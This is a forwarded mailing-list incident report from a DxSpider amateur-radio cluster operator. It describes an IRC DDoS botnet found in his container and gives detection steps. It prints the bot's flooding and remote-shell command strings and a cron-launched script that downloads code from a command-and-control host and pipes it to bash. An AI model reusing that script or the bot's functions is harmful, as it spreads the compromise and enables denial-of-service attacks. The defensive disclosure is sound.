[Dxspider-support] Fwd: [sysops] URGENT Suspicious traffic in my container - Scanbot

IZ2LSC iz2lsc.andrea at gmail.com
Sat Sep 6 18:05:01 BST 2025 

Dirk et all,
please have a look to email below that I received on the sysops mailing
list.
I also suggest all the sysop to check if they have something like reported
by Patrick.
Patrick stated that on his container only the dxspider port is open to the
internet.
It's a bit concerning.

Meantime I will ask Patrick to join this list.

73

andrea
iz2lsc

-->


---------- Forwarded message ---------
From: Patrick Skerrett via sysops <sysops at dxcluster.info>
Date: Sat, Sep 6, 2025 at 5:43 PM
Subject: [sysops] URGENT Suspicious traffic in my container - Scanbot
To: <sysops at dxcluster.info>


I run DxSpider as a docker container on my swarm cluster. I had a ping this
morning from my IDS router that there was some command & control traffic to
IRC coming from the node that runs DxSpider.

In looking, I found what looks like a DDOS bot deployed on my node, as the
user 'sysop' (that the DXSpider user runs under).

*************
Considering the DXSpider server runs in an isolated container and the
suspicious files were written as the 'sysop' owner, I think I have to
conclude there is a vulnerability in the DxSpider software that allowed
this payload to be deployed!!
*********

Here is the relevant info:

Payload was written to "/var/tmp/.. / "  That is dot dot space

Obfuscated directory name to make it hard to navigate to.

The process itself is a compiled application called '-bash'

Trying to view it in a hex editor, I discovered these strings:

root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
"(http|tcp|connect|socket|bot|scan)" | head -10
NOTICE %s :Unable to create socket.
http://
NOTICE %s :Unable to connect to http.
NOTICE %s :GET <http address> <save as>                     = Downloads a
file off the web and saves it onto the hd
[32m botnet
[36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp
pass
[37m bot nick is required e.g
[37m bot ident is required e.g
[37m bot realname is required e.g
Not a socket

root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
"(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
MODE %s +xi
JOIN %s :%s
PONG %s
JOIN %s
MODE %s +o %s
PRIVMSG
PING
JOIN
DT_JOINABLE
_PRIVMSG

root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i
"NOTICE"
NOTICE %s :Unable to comply.
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
NOTICE %s :Receiving file.
NOTICE %s :Saved as %s
NOTICE %s :Spoofs: %d.%d.%d.%d
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
NOTICE %s :Bot by anonymous
NOTICE %s :NICK <nick>
NOTICE %s :Nick cannot be larger than 9 characters.
NOTICE %s :DISABLE <pass>
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs>                          = Special
packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>                       = An advanced
syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>                          = Another
non-spoof udp flooder
NOTICE %s :NICK <nick>                                      = Changes the
nick of the client
NOTICE %s :SERVER <server>                                  = Changes
servers
NOTICE %s :GETSPOOFS                                        = Gets the
current spoofing
NOTICE %s :SPOOFS <subnet>                                  = Changes
spoofing to a subnet
NOTICE %s :DISABLE                                          = Disables all
packeting from this client
NOTICE %s :ENABLE                                           = Enables all
packeting from this client
NOTICE %s :KILL                                             = Kills the
client
NOTICE %s :GET <http address> <save as>                     = Downloads a
file off the web and saves it onto the hd
NOTICE %s :VERSION                                          = Requests
version of client
NOTICE %s :KILLALL                                          = Kills all
current packeting
NOTICE %s :HELP                                             = Displays this
NOTICE %s :IRC <command>                                    = Sends this
command to the server
NOTICE %s :SH <command>                                     = Executes a
command
NOTICE %s :Killing pid %d.
NOTICE %s :%s




This is obviously bad stuff..


**** HOW TO DETECT IF THIS IS ON YOUR NODE****

As sudo:
 ps -ef |grep ScanBot
sysop       1990       1  0 09:40 ?        00:00:00 ScanBot

# ls -l "/var/tmp/.. /"
total 5340
-rw-r----- 1 sysop sysop   72770 Sep  6 09:39 block.lst
drwxr-xr-x 2 sysop sysop    4096 Apr  3 02:55 bot
-rwxr-xr-x 1 sysop sysop     855 Feb 12  2023 clear
-rwxr-xr-x 1 sysop sysop 3272064 Oct 12  2023 curl
drwxr-xr-x 2 sysop sysop    4096 Sep  6 09:31 pass_files
-rwxr-xr-x 1 sysop sysop 2094872 Jul 13  2024 rm
-rwxr-xr-x 1 sysop sysop     499 Sep  6 09:29 scanbot
-rw-r--r-- 1 sysop sysop       0 Sep  6 10:35 scanbot.lst
drwxr-xr-x 2 sysop sysop    4096 Dec  7  2023 screen

It created a crontab entry for the sysop user:
 /var/spool/cron/crontabs/sysop
root at node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sat Sep  6 09:29:49 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * "/var/tmp/.. "/scanbot

runs every minute and tries to re-download itself:

#!/bin/bash

cd "/var/tmp/.. "
shopt -s expand_aliases
alias curl="./curl"
type="randomscan"
host="cc.systemctl.cc"
api="scanbot.sh"
brute_type="spirit"
pubnick="sysop at 98.46.184.64"
privnick="sysop at 98.46.143.4"
scanbot()
{
    url="$1"
    if [ ! -z "$url" ]; then
        url="url = \"$url\""
        curl -K - << EOF
        ipv4
        fail
        silent
        connect-timeout = 60
        max-time = 120
        retry = 2
        $url
EOF
        sync
    fi
}
scanbot
$host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick
| bash







************
Please check to see if anyone is running this process, if so, we may have a
vulnerability that would allow the DXSpider cluster to become a DDOS C&C
vector!!!
********
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://mailman.tobit.co.uk/pipermail/dxspider-support/attachments/20250906/90df28bb/attachment-0001.htm>

More information about the Dxspider-support mailing list